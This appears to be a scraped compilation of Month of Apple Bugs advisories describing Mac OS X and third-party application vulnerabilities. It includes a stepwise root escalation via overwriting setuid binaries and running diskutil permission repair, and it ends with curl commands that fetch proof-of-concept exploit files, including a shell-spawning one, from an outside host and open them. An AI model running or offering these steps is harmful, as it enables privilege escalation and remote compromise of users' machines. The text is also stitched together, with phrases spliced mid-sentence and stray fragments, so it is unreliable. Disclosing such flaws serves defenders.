Multiple developers of Apple based software including Apples own developers seem to have a misunderstanding of how to properly use NSBeginAlertSheet, NSBeginCriticalAlertSheet, NSBeginInformationalAlertSheet, NSGetAlertPanel, NSGetCriticalAlertPanel, NSGetInformationalAlertPanel, NSReleaseAlertPanel, NSRunAlertPanel, NSRunCriticalAlertPanel, NSRunInformationalAlertPanel, and NSLog.
crashdump follows symlinks within the /Library/Logs/CrashReporter/ directory, allowing admin-group users to execute arbitrary code and overwrite files with elevated privileges. In couple with a specially crafted Mach-O binary, this can be used to write a malicious crontab entry, which will run with root privileges.Flip4Mac fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.
Apple Installer fails to properly handle package filename strings. It's a affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.
CFNetwork fails to handle certain HTTP responses properly, causing the_CFNetConnectionWillEnqueueRequests()function to dereference a NULL pointer, leading to a denial of service condition.
Software Update fails to properly handle the filename strings containing the swutmp extension. It's a affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.
QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).
UserNotificationCenter retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, it> will attempt to run anyFurther information:InputManagerprovided by the user. Code within the input manager will run under wheel privileges. In combination withdiskutiland a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.
The preference panes setuid helper,writeconfig, makes use of a shell script which lacks ofPATHsanitization, allowing users to execute arbitrary binaries under root privileges.
"Also, I’m pretty sure the SoD realized that writing to an SUID executable clears the SUID bit." -- Thomas Ptacek, Matasano.Actually, the problem isn't 'writing to setuid binaries' but the fact that diskutil "repairs permissions", thus after replacing directories, binaries and any other file, the original modes are set back. In other words: replace setuid binary with one of your choice (given that a BOM/Bill of Materials file acknowledges it's existence and properties), run diskutil repair permissions, profit. It remains unknown if Thomas just didn't understand the point or simply continues his usual blog wagon. Probably both.
Apple iChat AIM URI scheme handling is affected by a classic format string vulnerability, allowing remote users to cause a denial of service condition or arbitrary code execution.Further information:
Transmit does not allocate enough space when dealing with the string passed on via the ftps:// URL handler, leading to an exploitable heap-based buffer overflow condition.
Not at all, but they are the main focus. We'll be looking over popular OS X applications as well.
Further information:rumpusdis vulnerable to different remotely exploitable heap-based buffer overflows, denial of service conditions and local privilege escalation issues. Due to the fact that Rumpus works under root privileges, successful exploitation by unprivileged users would allow a full compromise of the system.
Most of these issues are related to both FTP and HTTP request parsing, as well as insecure use of thesystem()function and incorrect permissions and/or handling of setuid binaries.
slpdis vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Colloquy is vulnerable to a format string vulnerability in the handling of INVITE requests, that can be abused by remote users and requires no interaction at all, leading to a denial of service and potential arbitrary code execution.
Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation. A malicious user can overwrite the binaries and perform a disk permissions repair operation via the diskutil tool, effectively setting back the default ownership and permissions (root setuid).The _ATPsndrsp function is vulnerable to a heap-based buffer overflow condition, due to insufficient checking of user input. This leads to a denial of service condition and potential arbitrary code execution by unprivileged users. A specially crafted HFS+ filesystem in a DMG image can cause the do_hfs_truncate() function to panic the kernel (denial of service), when attempting to remove a file from the mounted filesystem. This issue can't lead to arbitrary code execution, although there's a significant risk of local HFS+ filesystems corruption.
- MOAB-13-01-2007
- Proof of concept image: MOAB-13-01-2007.dmg.gz
A specially crafted UFS filesystem in a DMG image can cause theFor further information:ufs_lookup()function to callufs_dirbad()when a corrupted directory entry is being read, leading to a kernel panic (denial of service).
The byte_swap_sbin() function, one of the UFS byte swapping routines (this code isn't present in FreeBSD and it's Mac OS X XNU-specific; used for compatibility of filesystem streams between little and big-endian systems) is affected by a integer overflow vulnerability, leading to an exploitable denial of service condition.The ffs_mountfs() function, part of the UFS filesystem handling code (shared between FreeBSD and Mac OS X XNU) is affected by an integer overflow vulnerability, leading to an exploitable denial of service condition and potential arbitrary code execution.
Finder is affected by a memory corruption vulnerability, which leads to an exploitable denial of service condition and potential arbitrary code execution, that can be triggered by DMG images.
Application Enhancer (APE) is affected by different issues, one of them is a local privilege escalation vulnerability which allows local users to gain root privileges in the system by either patching theFurther information:ApplicationEnhancerbinary or replacing it. This binary is executed with root privileges and drops them (via setuid to current user id), but the file is actually writable, as well as the whole tree under/Library/Frameworks, allowing the mentioned condition to be abused for privilege escalation.
MD5 (../ape/ape-202.dmg) = b9388ac7a64d03a07a565906b6ef4510
MD5 (../ape/silent/ape-202-orig_after.dmg) = b9388ac7a64d03a07a565906b6ef4510
OmniWeb is affected by a format string vulnerability in the handling of Javascript alert() function, which could allow remote arbitrary code execution.
The current PDF specification is affected by a design flaw: a rogue Pages entry or malicious catalog dictionary could cause a denial of service (memory corruption condition, memory leakage, etc) or potential arbitrary code execution in the reader application.Further information:
A vulnerability in the handling of BOM files allows to set rogue permissions on the filesystem via the 'diskutil' tool. This can be used to execute arbitrary code and escalate privileges. A malicious user could create a BOM declaring new permissions for specific filesystem locations (ex. binaries, cron and log directories, etc). Once 'diskutil' runs a permission repair operation the rogue permissions would be set, allowing to plant a backdoor, overwrite resources or simply gain root privileges.
A format string vulnerability in the handling of iPhoto XML feeds title field allows potential remote arbitrary code execution.
A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a cross-site scripting attack vector.For further information:
This MoAB issue shows that this vulnerability can also be used in a cross-zone scripting attack which could allow, in combination with other vulnerabilities, to remotely execute arbitrary code on the user's machine, as well as disclosure of the filesystem contents.Thanks to Aviv Raff for contributing this nice issue. Thanks to pdp for working around Quicktime scripting issues too.
A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC.
A vulnerability exists in the handling of the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition.For further information:
/usr/bin/say, and expects the command string to be located at 0x17a053c
$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
(...)
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
(...)
$ open pwnage-shell.qtl